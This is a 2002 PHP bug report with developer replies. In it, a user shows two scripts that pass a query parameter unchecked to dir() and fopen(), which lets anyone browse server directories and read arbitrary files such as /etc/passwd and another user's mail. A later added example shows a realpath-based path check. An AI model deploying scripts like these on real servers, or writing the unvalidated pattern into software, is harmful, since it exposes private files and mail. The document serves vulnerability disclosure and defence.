Bug #15185 Exploring the server resources with php
Submitted: 2002-01-23 14:26 UTC
Modified: 2002-05-03 00:00 UTC
From: koval at kocham dot cie dot gov dot pl
Assigned:
Status: No Feedback
Package: *Directory/Filesystem functions
PHP Version: 4.0.6
OS: Slackware
Private report: No
CVE-ID: None

 [2002-01-23 14:26 UTC] koval at kocham dot cie dot gov dot pl
I've found a possible bug in PHP 4.06. Using the simple function readdir(), I could explore about 90% of the server, including /var/spool/mail, /etc/passwd, etc.

I've written a simple script that lets me move through all directories:

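<?
// $dir comes straight from the query string (?dir=...) via register_globals,
// which was enabled by default in PHP 4.0.6. It is used without any validation.
if ($dir == "")
{
	$dir = ".";
}

// Print an HTML index of $dirName: subdirectories first, then files.
function getDirList ($dirName) {
	print("<h1>Index of: $dirName</h1><hr>");
	$dirs = array();      // full paths of subdirectories
	$files = array();     // file names
	$dirfiles = array();  // directory that holds each entry of $files
	$dirn = 0;
	$filen = 0;
	$d = dir($dirName);
	// Compare against false so an entry named "0" does not end the loop early.
	while (false !== ($entry = $d->read())) {
		if ($entry != "." && $entry != "..")
		{
			if (is_dir($dirName."/".$entry))
			{
				array_push($dirs, "$dirName/$entry");
				$dirn++;
			}
			else
			{
				array_push($files, "$entry");
				array_push($dirfiles, "$dirName");
				$filen++;
			}
		}
	}
	$d->close();

	// Links to subdirectories.
	$tmp = 0;
	while ($tmp < $dirn)
	{
		print("<a href='?dir=$dirs[$tmp]'>$dirs[$tmp]</a><br>");
		$tmp++;
	}

	// Links to files, each prefixed with a link to its directory.
	$tmp = 0;
	while ($tmp < $filen)
	{
		print("<a href='?dir=$dirfiles[$tmp]'>$dirfiles[$tmp]</a>/<a href='$dirfiles[$tmp]/$files[$tmp]'>$files[$tmp]</a><br>");
		$tmp++;
	}

	if ($dirName != ".")
	{
		print("<hr><button OnClick='javascript:history.back();'>Back</button>");
	}
}
getDirList("$dir");
?>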

The default directory is '.' (your home directory), but if you load this page with the parameter dir=/ (e.g. http://your.host/dir.php?dir=/), you will probably access the main folder on your Unix server.
I wrote a second script that lets me read files not in my home directory:

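<?
// $file also comes from the query string (?file=...) via register_globals.
// Polish names: $Plik = file handle, $rozm = size, $flaga = counter, $Linia = line.
function readtxt ($path)
{
	$Plik = fopen($path, "r");
	flock($Plik, 1);            // 1 = shared lock (LOCK_SH)
	$rozm = filesize("$path");
	$flaga = 0;
	// fgets() with length 2 returns at most one byte, so the file is printed byte by byte.
	while ($flaga < $rozm)
	{
		$Linia = fgets($Plik, 2);
		print("$Linia");
		if ($Linia == "\n")
		{
			print("<br>");
		}
		$flaga++;
	}
	flock($Plik, 3);            // 3 = release the lock (LOCK_UN)
	fclose($Plik);
}
readtxt ($file);
?>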

By typing, for example, http://your.host/readtxt.php?file=/var/spool/mail/disco_dzik, I could read disco_dzik's mail.

Simple, but serious...

Both scripts would not move you outside your home directory if the server were two machines (the first one for the system, and the second one just for home directories) - it's obvious, but I've checked it ;)

P.S.
The scripts were written for my own use only, so some of the variables are named in Polish - sorry for that ;)
This is a serious bug that needs to be fixed!
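
Both scripts above hand the request parameter straight to dir() and fopen(). The following added example (not part of the original report or of PHP itself) shows an application-level check that canonicalizes the parameter with realpath() and rejects anything outside one base directory. It assumes PHP 7.1 or later; resolve_within() and the demo tree are hypothetical names constructed for illustration.

```php
<?php
// Added example (not from the report): confine a user-supplied path to one
// base directory before it reaches dir(), opendir() or fopen().

// Returns the canonical path of $requested under $base, or null when the
// target is missing or escapes $base ("..", absolute path, or symlink).
// resolve_within() is a hypothetical helper name.
function resolve_within(string $base, string $requested): ?string
{
    $baseReal = realpath($base);
    if ($baseReal === false || strpos($requested, "\0") !== false) {
        return null;
    }
    // Treat the request as relative to the base, so "?dir=/" maps to the
    // base itself rather than the filesystem root.
    $real = realpath($baseReal . DIRECTORY_SEPARATOR . ltrim($requested, '/\\'));
    if ($real === false) {
        return null;
    }
    // Compare with a trailing separator so /srv/www-private is not accepted
    // as a child of /srv/www.
    $prefix = rtrim($baseReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($real !== $baseReal && strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// Constructed demo tree: public/ is the allowed base, secret.txt sits outside.
$tmp = sys_get_temp_dir() . '/listing_demo_' . getmypid();
mkdir($tmp . '/public/docs', 0700, true);
file_put_contents($tmp . '/public/docs/readme.txt', "hello\n");
file_put_contents($tmp . '/secret.txt', "outside the base\n");

$requests = ['', 'docs', 'docs/readme.txt', '/', '../secret.txt',
             '/etc/passwd', 'docs/../../secret.txt'];
foreach ($requests as $req) {
    $ok = resolve_within($tmp . '/public', $req) !== null;
    printf("%-26s %s\n", var_export($req, true), $ok ? 'allowed' : 'rejected');
}

// Remove the demo tree.
unlink($tmp . '/public/docs/readme.txt');
unlink($tmp . '/secret.txt');
rmdir($tmp . '/public/docs');
rmdir($tmp . '/public');
rmdir($tmp);
```

This is an application-level check only; the file permissions of the account the web server runs as, discussed in the replies below, still decide what PHP can read when a script skips it.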

History

 [2002-01-23 14:54 UTC] hholzgra@php.net
not a php issue

php runs with the same permissions as the user
the webserver runs under, so if this user has
permission to see the whole server filesystem
php will have that, too

run your webserver as a low-privileged user
and give it read permission to the absolute
minimum of the filesystem 

or have a look at 
http://www.php.net/manual/en/features.safe-mode.php
 [2002-01-23 16:52 UTC] daniel@php.net
Actually this is a dupe of MY bug report. PHP has a bug with readdir(). safe_mode does not limit readdir:

  http://bugs.php.net/bug.php?id=15018&edit=1

someone bogusified it. Wasn't me. And yes, I tested it on 4.1.0.

Kind Regards,
  Daniel Lorch
 [2002-01-23 17:13 UTC] rasmus@php.net
Daniel, please stop saying readdir() here. readdir() should not have any safe-mode checks any more than fgets() should. It simply makes no sense. opendir() is where the safe-mode check should be applied.
 [2002-04-02 13:49 UTC] sander@php.net
I'm pretty sure this has been fixed now. Can you try 4.2.0RC1 from www.php.net/~derick ?
 [2002-05-03 00:00 UTC] php-bugs at lists dot php dot net
No feedback was provided for this bug for over a month, so it is
being suspended automatically. If you are able to provide the
information that was originally requested, please do so and change
the status of the bug back to "Open".
 
Last updated: Sun Sep 19 13:03:37 2021 UTC